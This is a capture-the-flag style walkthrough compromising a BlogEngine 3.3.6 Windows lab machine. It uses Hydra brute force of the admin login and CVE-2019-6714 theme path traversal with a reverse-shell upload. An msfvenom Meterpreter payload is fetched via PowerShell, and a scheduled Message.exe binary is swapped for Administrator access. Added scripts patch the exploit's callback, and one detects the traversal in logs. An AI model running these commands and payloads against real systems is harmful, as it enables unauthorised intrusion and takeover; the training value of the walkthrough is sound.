Start by noting the target machine's IP address, then run an nmap scan to find out which services are exposed.
What is the name of the clown displayed on the frontpage?
Perform an nmap scan with version detection (-sV) and skip host discovery (-Pn). Windows hosts often drop ICMP, so without -Pn nmap may wrongly report the target as down.
nmap -sV -Pn [target IP address]
Start DirBuster by typing dirbuster. Choose one of the pre-set wordlists. I used directory-list-2.3-medium.txt in this instance.
On Kali, the DirBuster wordlists are under /usr/share/wordlists/dirbuster/
DirBuster reports its progress both in its graphical interface and on the command line. One directory found worth looking into is /admin
Check it out in your browser.
We see that the website uses BlogEngine as its content management system. A Google search tells us what the default credentials are and whether they still work.
Apparently it uses admin for both the default username and the default password.
Using them doesn't get us in, so now we try to find out what the password is. We use Burp Suite to help with this.
Toggle FoxyProxy in your browser to route traffic to Burp's proxy listener (127.0.0.1:8080 by default).
With Burp Suite intercepting traffic, we can take a closer look at exactly what the browser sends to the website when we submit the login form.
We're going to use that captured POST request to brute force the password with Hydra.
Inside the Request box, we're interested in line 1 and line 16. Line 1 contains the HTTP method and the path the credentials are sent to. In this case it's POST /Account/login.aspx?ReturnURL=%2Fadmin
Line 16 is the request body: the form parameters the browser sends to the website, including the hidden ASP.NET fields __VIEWSTATE and __EVENTVALIDATION. That is the text we'll copy into the Hydra command, replacing the username and password values with markers that tell Hydra where to substitute its guesses.
You can always type hydra --help at the command prompt to find out how to use it. In this example, we run this command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.84.88 http-post-form "/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=p52E5Ou%2FrrWaZJfz92Gx%2FfbpTzKoVM6sywhHUacCZjGLdRonH5QTP1mNXo6Jq1zqGPSjCjx1GW0JD3uK%2FA%2FhRbMYeIQe7X43l9h64%2BmsJm76y2cLnjW7pz4Ryn7HB35fO5iQCx4hkngHGjZYvU1b293j5U%2FrW%2B5mTebe5NHY%2Fp%2FSpmjkwJAQBJ%2FnuqJaZHMqT%2BBW5S2oR3KDpXHmcfY91thBwTqi9%2BSMnB8BZ5l5OkdYDiUlxFHzFlq5W0ursJgtX3ZSfAueXH4mX3fOaAPavgRDeNtIWPWXK1GGM0ZY93VGzHFQhU2ME1rtOZUhVvaFBcMLcvbBY%2FMO4DlZ0Ltr82UAGwz50SoDmVER8E8bc60p%2FXnd&__EVENTVALIDATION=4hWUNiJYjd%2F3Rm1qa7k9GUH%2FRDbBtz2hM7GNL%2BsyQ3QhWVe%2B0ezaK%2FIOB%2B7oJ9bQnn5xzEjvWhAwKaiW5y%2BnI3DthkRl8IRJH61NfmT9GgSZGcnliZMy5%2FrXhlHVtTDzsRkW35dolvtg71GPDhdooRXWAolAvwPL5WJ7hq4wfk%2Fn1dND&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -vv
-l admin: use the single username admin rather than a list (-L would take a file of usernames)
-P /usr/share/wordlists/rockyou.txt: the password list to try
10.10.84.88: the IP address of the machine you're attacking
http-post-form: the Hydra module for login forms submitted with HTTP POST. Its quoted argument has three parts separated by colons: the path, the POST body, and a string that appears in the response when the login fails (here Login Failed). A literal colon inside the body would have to be escaped as \:
^USER^: placeholder Hydra replaces with the username, which here is always admin
^PASS^: placeholder Hydra replaces with each password from the wordlist in turn
-vv: verbose output, so you can watch the attempts as they happen
The __VIEWSTATE and __EVENTVALIDATION values are copied verbatim from the capture. This only works because BlogEngine accepts the same values being replayed on every attempt; an application that rejects a stale viewstate would need a script that fetches a fresh login page before each guess, which Hydra cannot do.
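Turning the captured request into the http-post-form argument by hand is where most mistakes happen (wrong field names, markers percent-encoded, a stray colon). The script below, an added example that is not part of the original write-up, builds the argument from the raw request as Burp shows it. CAPTURED_REQUEST is a constructed, shortened stand-in for the real capture: the field names match the request on this page, but the hidden ASP.NET values are truncated.

```python
"""
Build the Hydra http-post-form argument from a Burp-captured login request.

Added example, not part of the original write-up. CAPTURED_REQUEST is a
constructed, shortened stand-in for the real capture (the hidden ASP.NET
values are truncated); only the field names come from the request on the page.
"""
from urllib.parse import parse_qsl, urlencode

# Constructed sample of what Burp shows in the Request box (CRLF line endings).
CAPTURED_REQUEST = (
    "POST /Account/login.aspx?ReturnURL=%2Fadmin HTTP/1.1\r\n"
    "Host: 10.10.84.88\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "__VIEWSTATE=p52E5Ou%2FrrWa&__EVENTVALIDATION=4hWUNiJYjd%2F3"
    "&ctl00%24MainContent%24LoginUser%24UserName=admin"
    "&ctl00%24MainContent%24LoginUser%24Password=admin"
    "&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in"
)

USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"
FAILURE_MARKER = "Login Failed"   # text present in the response to a bad login


def split_request(raw):
    """Return (method, path, headers, body) from a raw HTTP/1.1 request."""
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.strip()


def hydra_form_string(raw, user_field=USER_FIELD, pass_field=PASS_FIELD,
                      failure_marker=FAILURE_MARKER):
    """Turn the captured request into Hydra's 'path:body:failure-string' argument."""
    method, path, _headers, body = split_request(raw)
    if method != "POST":
        raise ValueError("expected a POST request")
    # keep_blank_values keeps empty hidden fields that ASP.NET still expects to see
    fields = dict(parse_qsl(body, keep_blank_values=True))
    missing = [f for f in (user_field, pass_field) if f not in fields]
    if missing:
        raise KeyError(f"fields not found in body: {missing}")
    fields[user_field] = "^USER^"
    fields[pass_field] = "^PASS^"
    # Re-encode exactly as the browser did ($ -> %24, / -> %2F, space -> +) but
    # leave Hydra's ^...^ markers intact. urlencode also percent-encodes any ':'
    # in a value, so it cannot collide with Hydra's separator.
    encoded = urlencode(fields, safe="^")
    return f"{path}:{encoded}:{failure_marker}"


def hydra_command(raw, host, username, wordlist):
    """Full argv list for hydra; a list so nothing needs shell quoting."""
    return ["hydra", "-l", username, "-P", wordlist, host,
            "http-post-form", hydra_form_string(raw), "-vv"]


if __name__ == "__main__":
    import shlex
    print(shlex.join(hydra_command(CAPTURED_REQUEST, "10.10.84.88", "admin",
                                   "/usr/share/wordlists/rockyou.txt")))
```

Run it and paste the printed command; if the login form on another target uses different field names, change USER_FIELD and PASS_FIELD and the script will refuse to run until both are present in the captured body.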
Hydra finds the password: 1qaz2wsx
Go to http://10.10.84.88/admin (use your own target's IP address) and log in with admin / 1qaz2wsx
We now have access to the administrator panel of the blog. We can create, edit, and delete posts. We can also upload files, including a possible exploit we can use to compromise the computer.
Snoop around. Click the About section of the admin panel and we can see it's BlogEngine 3.3.6. We can use that exact version to look up known vulnerabilities.
Exploit-DB (https://www.exploit-db.com) is a searchable archive of public exploits other researchers have written. We'll look there.
Search for blogengine 3.3.6. We are given a handful of possible exploits. We're going to pick the one written by Dustin Cobb, dated February 12, 2019.
14. What is the CVE? CVE-2019-6714
You can view the exploit in its raw format or download the file. Raw format: copy and paste it into your text editor.
The exploit's Exploit-DB ID is 46353.
The first lines of the exploit outline how to use it:
1. Edit the exploit 46353
2. Point it at your own machine by locating this line:
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445))
3. Change 10.10.10.20 to your IP address
4. Change 4445 to 4444 (or whatever you want; just remember it when you start the listener)
5. Save the file as PostView.ascx. The name matters: the exploit abuses the way BlogEngine loads a theme's PostView.ascx control, so a file with any other name will never be executed.
Your own IP address
If you don't know your IP address, or your VPN (tun0) address, enter ip a at your command prompt.
That is the address to put into the exploit file.
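The two things that silently break this step are an unchanged callback address and the wrong upload name (the page itself slips between PostList and PostView). The script below, an added example that is neither part of the write-up nor of the exploit, patches the TcpClient line, refuses to continue unless exactly one such line was found, validates the address, and writes the result under the name the exploit expects. EXPLOIT_SNIPPET is a constructed two-line stand-in for the real 46353 source; only the TcpClient line is taken from the usage notes quoted above.

```python
"""
Patch the callback host/port in the Exploit-DB 46353 source and save it as
PostView.ascx. Added example, not part of the write-up or of the exploit.
EXPLOIT_SNIPPET is a constructed stand-in for the real file.
"""
import ipaddress
import re
import tempfile
from pathlib import Path

EXPLOIT_SNIPPET = (
    "// constructed stand-in for 46353.cs; the real file is much longer\n"
    'using(System.Net.Sockets.TcpClient client = '
    'new System.Net.Sockets.TcpClient("10.10.10.20", 4445))\n'
)

# Matches the one line that decides where the reverse shell connects back to.
TCPCLIENT_RE = re.compile(
    r'new System\.Net\.Sockets\.TcpClient\("(?P<host>[^"]+)",\s*(?P<port>\d+)\)'
)

# BlogEngine loads a theme's PostView.ascx; a file with any other name is ignored.
UPLOAD_NAME = "PostView.ascx"


def callback_target(source):
    """Return (host, port) currently hard-coded in the exploit, or None."""
    m = TCPCLIENT_RE.search(source)
    return (m.group("host"), int(m.group("port"))) if m else None


def patch_callback(source, lhost, lport):
    """Return the source with the callback pointed at lhost:lport."""
    ipaddress.ip_address(lhost)            # ValueError on a typo such as "10.9.2."
    if not 1 <= lport <= 65535:
        raise ValueError(f"port out of range: {lport}")
    patched, count = TCPCLIENT_RE.subn(
        f'new System.Net.Sockets.TcpClient("{lhost}", {lport})', source)
    if count != 1:
        raise ValueError(f"expected exactly one TcpClient(...) line, found {count}")
    return patched


def patched_upload(source, lhost, lport):
    """(filename, contents) pair ready to be uploaded through the blog's file manager."""
    return UPLOAD_NAME, patch_callback(source, lhost, lport)


def write_exploit(source, lhost, lport, out_dir):
    """Write the patched exploit into out_dir and return its path."""
    name, contents = patched_upload(source, lhost, lport)
    out = Path(out_dir) / name
    out.write_text(contents)
    return out


def listener_command(lport):
    """The Netcat listener that matches the patched port."""
    return f"nc -nvlp {lport}"


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        path = write_exploit(EXPLOIT_SNIPPET, "10.9.2.209", 4444, d)
        print(path.name, callback_target(path.read_text()))
        print("then run:", listener_command(4444))
```

Point it at the downloaded 46353.cs instead of EXPLOIT_SNIPPET, pass your tun0 address and chosen port, and upload the PostView.ascx it writes.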
Go back to your browser. Click the existing post and edit it. We will use the post editor's file upload to upload the exploit as PostView.ascx
This video shows how to upload the exploit
We'll use Netcat to wait for a connection from the target machine. Enter this at your command prompt:
nc -nvlp 4444
-n: do not resolve names
-v: be verbose when a connection happens
-l: listen for an incoming connection
-p: the port to listen on
4444: the port you put into the exploit file earlier; the two must match
Open a new browser tab. Point your browser to http://[Target IP]/?theme=../../App_Data/files. In this case it will be http://10.10.84.88/?theme=../../App_Data/files
The ../../ in the theme parameter walks out of the themes folder into App_Data/files, the directory the file manager saved PostView.ascx to, so BlogEngine loads our file as if it were a theme control and runs it.
Your browser tab will look like it has frozen or has not finished loading. Ignore it. Go back to your command prompt and check Netcat.
Netcat will display a message when a connection arrives, and you will then see a blank prompt. This target is a Windows machine, so listing directory contents is dir rather than ls.
Type whoami to find out which account we are running as. It reveals iisapppool\blog, the low-privilege application pool identity of the web server.
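The traversal above is the whole of CVE-2019-6714: the theme name from the query string is joined straight into a filesystem path. As an added example (a Python model, not BlogEngine's code), the block below shows that lookup beside a hardened version, and a check that flags the same traversal in web-server log lines. The directory layout (Custom/Themes for themes, App_Data/files for uploads) and the log line format are assumptions; SAMPLE_LOG is constructed.

```python
"""
Why '?theme=../../App_Data/files' works, and how to catch it.
Added example, not BlogEngine's code. Paths and the log format are assumed.
"""
import posixpath
from urllib.parse import parse_qs, unquote

WEBROOT = "/inetpub/wwwroot/blog"                       # assumed
THEMES_DIR = posixpath.join(WEBROOT, "Custom/Themes")    # assumed theme folder
UPLOAD_DIR = posixpath.join(WEBROOT, "App_Data/files")   # file-manager upload folder


def theme_control_vulnerable(theme):
    """Bug class behind CVE-2019-6714: the untrusted theme name is joined into the path."""
    return posixpath.normpath(posixpath.join(THEMES_DIR, theme, "PostView.ascx"))


def theme_control_hardened(theme):
    """Accept only a bare directory name, then verify the result stays inside THEMES_DIR."""
    if not theme or theme in (".", "..") or "/" in theme or "\\" in theme or "\0" in theme:
        raise ValueError(f"invalid theme name: {theme!r}")
    path = posixpath.normpath(posixpath.join(THEMES_DIR, theme, "PostView.ascx"))
    # Defence in depth: even if the name check is bypassed, refuse anything
    # that resolves outside the themes folder.
    if posixpath.commonpath([path, THEMES_DIR]) != THEMES_DIR:
        raise ValueError("theme path escapes the themes directory")
    return path


def theme_traversal_in_log_line(line):
    """Flag a request whose theme parameter climbs directories.

    Constructed log format: 'date time c-ip cs-method cs-uri-stem cs-uri-query'
    with '-' for an empty query, loosely modelled on IIS W3C logging.
    """
    parts = line.split()
    if len(parts) < 6:
        return False
    query = "" if parts[5] == "-" else parts[5]
    for value in parse_qs(query).get("theme", []):
        # parse_qs decoded once; decode again to catch %252e%252e double
        # encoding, and treat backslashes as separators as Windows does.
        decoded = unquote(value).replace("\\", "/")
        if ".." in decoded.split("/"):
            return True
    return False


# Constructed log lines: a traversal, a legitimate theme, an unrelated request,
# and the same traversal double-encoded.
SAMPLE_LOG = [
    "2019-08-03 10:50:01 10.9.2.209 GET / theme=../../App_Data/files",
    "2019-08-03 10:50:02 10.9.2.209 GET / theme=Standard",
    "2019-08-03 10:50:03 10.9.2.209 GET /admin -",
    "2019-08-03 10:50:04 10.9.2.209 GET / theme=%252e%252e%252f%252e%252e%252fApp_Data%252ffiles",
]


def flagged_lines(lines):
    """Return only the log lines carrying a theme traversal."""
    return [line for line in lines if theme_traversal_in_log_line(line)]


if __name__ == "__main__":
    print("vulnerable lookup resolves to:",
          theme_control_vulnerable("../../App_Data/files"))
    print("hardened lookup for 'Standard':", theme_control_hardened("Standard"))
    for line in flagged_lines(SAMPLE_LOG):
        print("traversal:", line)
```

The name check alone is enough for the fix; the commonpath test is there so that a future bypass of the first check (a different separator, an encoding trick) still cannot leave the themes folder.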
24. Escalate privileges by creating a meterpreter shell
The machine is compromised, but we are running as the web server's application pool account, not as Administrator or SYSTEM, and that is what we want so we get ALL the privileges. For that we will create a Meterpreter payload to upload to the compromised machine using msfvenom. The full command, assembled from the options explained below:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.2.209 LPORT=4445 -f exe > shell.exe
-p windows/meterpreter/reverse_tcp: a Meterpreter payload that connects back to us over TCP
LHOST=10.9.2.209: local host, which is your IP address. You determined that earlier with ip a
LPORT=4445: another listening port. Remember 4444 is already in use by the Netcat connection
-f exe > shell.exe: output as a Windows executable named shell.exe
Now we need to get shell.exe onto the target. Python has that covered: in the same command prompt where you created the payload, type:
python3 -m http.server 8000
This starts an HTTP server on port 8000 that serves the current directory. To verify it, open a new browser tab and go to http://[your IP address]:8000, in this case http://10.9.2.209:8000
You should see the files in the directory where you created shell.exe.
From the command prompt at the target machine, enter the command:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
This tells the target machine to use PowerShell to download the file from your web server at 10.9.2.209:8000/shell.exe and save it in its C:\Windows\Temp\ directory.
You should now see shell.exe inside the C:\Windows\Temp folder.
The Meterpreter shell works with Metasploit. We will start Metasploit before executing shell.exe on the remote machine. Start it by running:
msfconsole
Within msfconsole, we will use the generic multi/handler listener. Type:
use exploit/multi/handler
Set handler options
We have to set the payload and the proper options so shell.exe will communicate correctly with our Metasploit listener. The payload must be the same one msfvenom built, otherwise the handler cannot stage it. Enter:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [YOUR IP Address] and in this case
set LHOST 10.9.2.209
set LPORT 4445
We are telling MSF to listen on port 4445. Remember we told shell.exe to talk to 10.9.2.209 on port 4445.
Double-checking the values with show options is optional, but it's good practice.
32a. Execute the Metasploit listener. Enter:
run
Running shell.exe on the target will start the Meterpreter shell, which connects back to Metasploit and gives us far more to work with. Go back to the command prompt window with the Windows shell on the remote machine.
Navigate to C:\Windows\Temp if you're not there yet.
Run shell.exe. Enter:
shell.exe
Go back to your Metasploit prompt window.
Below the command you typed to start the listener you should see:
Started reverse TCP handler on 10.9.2.209:4445
followed by a line reporting that a Meterpreter session has opened.
We can get more info about the compromised machine by typing sysinfo at the meterpreter prompt.
winPEAS is a program we will run on the remote machine to gather even more information. What we're looking for is a way to run something as Administrator or SYSTEM, which will let us into restricted folders and files.
Do a Google search, or point another browser tab to:
https://github.com/carlospolop/PEASS-ng
From your attacking machine, navigate to a folder where you want winPEAS to live. Then clone PEASS-ng by copying the command from GitHub into your command prompt. Type:
git clone https://github.com/carlospolop/PEASS-ng
Now that the repository has been cloned, look around. winPEAS is just one of its components: it gathers privilege escalation information about Windows machines, and the repository has equivalent utilities for other systems. Type these commands:
cd PEASS-ng
ls
The version we'll use is winPEAS.bat, a Windows batch file: a plain list of commands for the machine to execute. (The repository also ships winPEAS as a .exe; the .bat needs no .NET runtime on the target.)
Copy winPEAS.bat (found under winPEAS/winPEASbat/ in the repository) to the folder you are serving with the Python web server you started earlier.
Now that winPEAS is hosted and reachable from the target machine, we download it.
Go to your command prompt window with the Windows shell.
Enter the PowerShell command:
powershell -c "Invoke-WebRequest -Uri 'http://10.9.2.209:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"
winPEAS has been fetched from the web server.
In the Python web server's output you should see the request logged; on the Windows side the file is now in C:\Windows\Temp.
Go back to the command prompt window with the Windows shell on the remote machine. List the directory contents by entering dir
Then run it by typing winPEAS.bat
winPEAS will look up a lot of information about the target machine. Sit back and enjoy.
In the video above, at approximately the 0:17 mark, winPEAS lists the running processes. Many of them were started by the system and therefore run with SYSTEM privileges. The interesting one is Windows Scheduler, whose process is WScheduler.exe
What service is interesting?
Windows Scheduler or WScheduler.exe
What is the Windows Build?
Windows 2012 R2 (6.3 Build 9600)
From the Windows command prompt, find the location of the Scheduler program. It is located at C:\Program Files (x86)\SystemScheduler. The path contains a space, so quote it:
cd "C:\Program Files (x86)\SystemScheduler"
There are two files worth checking out right away: 20198415519.INI and 20198415519.INI_LOG.txt. To quickly view the contents, enter
type 20198415519.INI_LOG.txt
Nothing much there except that the job was run by Administrator. We're on the right track.
One of the programs executed every few minutes is Message.exe. Because the scheduler runs it as Administrator, anything we put in its place will also run as Administrator.
Rename shell.exe to Message.exe and put it where Message.exe lives, keeping a copy of the original. At your command prompt, enter:
copy C:\Windows\Temp\shell.exe "C:\Program Files (x86)\SystemScheduler"
cd "C:\Program Files (x86)\SystemScheduler"
ren Message.exe Message.bak
ren shell.exe Message.exe
We still have a Meterpreter session from the shell.exe that iisapppool\blog ran earlier.
Close it by entering exit.
Then simply start the handler again with run.
Wait a few seconds, because the scheduler only launches Message.exe every few minutes. When it does, our renamed shell.exe runs as Administrator and a new Meterpreter session opens with those privileges.
You don't have to drop into the Windows shell (the shell command) to look around; you can use the Meterpreter prompt directly.
The flags are located in:
What is the abnormal service running?
Windows Scheduler (WScheduler.exe)
What is the binary you're supposed to exploit?
Message.exe
Original Install Time
8/3/2019, 10:43:23 AM